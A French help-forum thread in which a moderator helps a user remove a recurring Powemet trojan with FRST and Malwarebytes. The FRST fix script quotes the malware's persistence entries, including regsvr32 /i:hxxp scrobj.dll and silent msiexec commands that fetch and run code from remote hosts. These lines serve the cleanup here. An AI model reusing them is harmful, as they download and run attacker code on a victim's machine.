Sujet Précédent Sujet Suivant

Trojan:Win32/Powemet.A!attk

Résolu/Fermé
Srrr Messages postés 38 Date d'inscription lundi 20 août 2018 Statut Membre Dernière intervention 9 décembre 2021 - 20 août 2018 à 23:09
Srrr Messages postés 38 Date d'inscription lundi 20 août 2018 Statut Membre Dernière intervention 9 décembre 2021 - 24 août 2018 à 23:53
Bonsoir,

Windows defender me signal un virus qui se redémarre tout de suite une fois supprimé il s'agit de Trojan:Win32/Powemet.A!attk. Et ce depuis bientôt 1 mois. Celui-ci m'inquiète car il est présenté comme grave d'après Windows defender.

Pour l'instant je n'ai rien eu d'inquiétant lors de mon utilisation habituel, même si je sais que l'action d'un virus ne se voit pas tout le temps.

Merci d'avance pour vos réponse quant au moyen de stopper ce virus bonne nuit.
A voir également:

12 réponses

Réponse 1 / 12
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 660
20 août 2018 à 23:14
Salut,

Pour vérifier l'ordinateur, je t'invite à faire cette analyse FRST et donner les rapports en retour :

Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).

Télécharge et lance le scan FRST,
Attendre la fin du scan, un message indique que l'analyse est terminée.

Trois rapports FRST seront générés :
  • FRST.txt
  • Shortcut.txt
  • Additionnal.txt


Envoie ces 3 rapports sur le site https://pjjoint.malekal.com/ afin de les partager.
En retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.


0
Réponse 2 / 12
Srrr Messages postés 38 Date d'inscription lundi 20 août 2018 Statut Membre Dernière intervention 9 décembre 2021
20 août 2018 à 23:16
Merci, je fait sa tout de suite
0
Réponse 3 / 12
Srrr Messages postés 38 Date d'inscription lundi 20 août 2018 Statut Membre Dernière intervention 9 décembre 2021
20 août 2018 à 23:32
Voici les lien des 3 rapports :
FRST https://pjjoint.malekal.com/files.php?id=FRST_20180820_w12c12m9c8s5
Addition https://pjjoint.malekal.com/files.php?id=20180820_n13f12n14c7i11
Shortcut https://pjjoint.malekal.com/files.php?id=20180820_x5x5y13l12j14
0
Réponse 4 / 12
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 660
Modifié le 20 août 2018 à 23:36
Tu as des programmes qui ont été installés à l'achat de l'ordinateur ou installés par la suite et qui sont pas forcément utiles.
Ils encombrent Windows et peuvent le ralentir.
Tu peux donc les désinstaller.
Vas dans le Panneau de configuration
puis programmes et fonctionnalités.
Désinstalle :

CyberLink
Reimage Repair(arnaque)


Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Relance FRST puis sur ton clavier appuyer sur la touche CTRL + Y.
Le bloc-note va s'ouvrir, copie/colle ceci. 

CreateRestorePoint:
CloseProcesses:
 2018-08-16 00:16 - 2018-05-21 14:56 - 000000000 ____D C:\ProgramData\Reimage Protector 
Task: {57FF6293-4749-4112-9579-398948198854} - System32\Tasks\Windows-WoShiBeiYongDe => regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj85OTJYFUVXNWJXOTLSMWYxRjY3FUM1NTLSNUQWOTF5MH== scrobj.dll <==== ATTENTION
Task: {5899DDCC-9835-4932-AB36-0ED554C5349B} - System32\Tasks\ReimageUpdater => C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe [2018-04-25] (Reimage®) <==== ATTENTION
HKU\S-1-5-21-1377529002-2413682301-2725971039-1001\...\Run: [Free Download Manager] => C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\fdm.exe [10162176 2018-05-11] (FreeDownloadManager.org)
HKU\S-1-5-21-1377529002-2413682301-2725971039-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.orangeiloveyou.com/?data=zDlkMj85OTJYFUVXNWJXOTLSMWYxRjY3FUM1NTLSNUQWOTF5MH== /q <==== ATTENTION [Country : US - 54.72.9.51] 
Task: {7971DA76-8C10-438F-9CBD-346E2479BB7F} - System32\Tasks\PowerWord-SCT-JT => regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj85OTJYFUVXNWJXOTLSMWYxRjY3FUM1NTLSNUQWOTF5MH== scrobj.dll <==== ATTENTION
RemoveProxy:
Reboot:


Enregistre le contenu par le menu fichier puis enregistrer.

Ferme le bloc-note, retourne sur FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire et automatique.
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur.


0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
Réponse 5 / 12
Srrr Messages postés 38 Date d'inscription lundi 20 août 2018 Statut Membre Dernière intervention 9 décembre 2021
24 août 2018 à 22:17
Voici le lien du fichier texte :
https://pjjoint.malekal.com/files.php?id=20180824_c10i15p13n8y7
J'ai réalisé cette manipulation mardi et le virus a disparu pendant 3 jours puis windows defender l'a redetecté.
Pourquoi le logiciel "free dowload manager" a été supprimé?
0
Réponse 6 / 12
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 660
24 août 2018 à 22:42
Parce que la correction FRST n'a pas fonctionné.
Il y a des retours à la ligne anormale dans les données que j'ai données.
Tu as dû passer par Word ou je sais pas trop.
A refaire en suivant les instructions.
0
Réponse 7 / 12
Srrr Messages postés 38 Date d'inscription lundi 20 août 2018 Statut Membre Dernière intervention 9 décembre 2021
24 août 2018 à 22:51
https://pjjoint.malekal.com/files.php?id=20180824_q13q9m15x5i8
0
Réponse 8 / 12
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 660
24 août 2018 à 22:56
c'est mieux,
Lance un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite

0
Réponse 9 / 12
Srrr Messages postés 38 Date d'inscription lundi 20 août 2018 Statut Membre Dernière intervention 9 décembre 2021
24 août 2018 à 22:57
Pourquoi le logiciel "free dowload manager" a été supprimé?
0
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 660
24 août 2018 à 23:03
il a juste été retiré du démarrage, tu peux le lancer par le menu démarrer.
0
Réponse 10 / 12
Srrr Messages postés 38 Date d'inscription lundi 20 août 2018 Statut Membre Dernière intervention 9 décembre 2021
24 août 2018 à 23:48
Voici le lien du Comptes-rendus de Malwarebytes :
https://pjjoint.malekal.com/files.php?id=20180825_l14c9c9w15p9
J'ai mis ces menaces en quarantaine.
0
Réponse 11 / 12
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 660
24 août 2018 à 23:51
ok quelques trucs restants.
Vois si Windows Defender continue à émettre des alertes.
0
Réponse 12 / 12
Srrr Messages postés 38 Date d'inscription lundi 20 août 2018 Statut Membre Dernière intervention 9 décembre 2021
24 août 2018 à 23:53
Daccord, je vous tien au courant
0

Discussions similaires

Comment supprimer le virus Trojan
vitsou -
vitsou -

18 réponses
Aide pour un virus
cerise92700 -
MisteryBean -

41 réponses
Trojan impossible à supprimer!
Gridouu -
Malekal_morte- -

12 réponses
Virus : trojan:win32/wacatac.h!ml
Alky09 -
bazfile -

8 réponses
Comment éliminer manuellement virus trojan?
ballag -
RClog -

12 réponses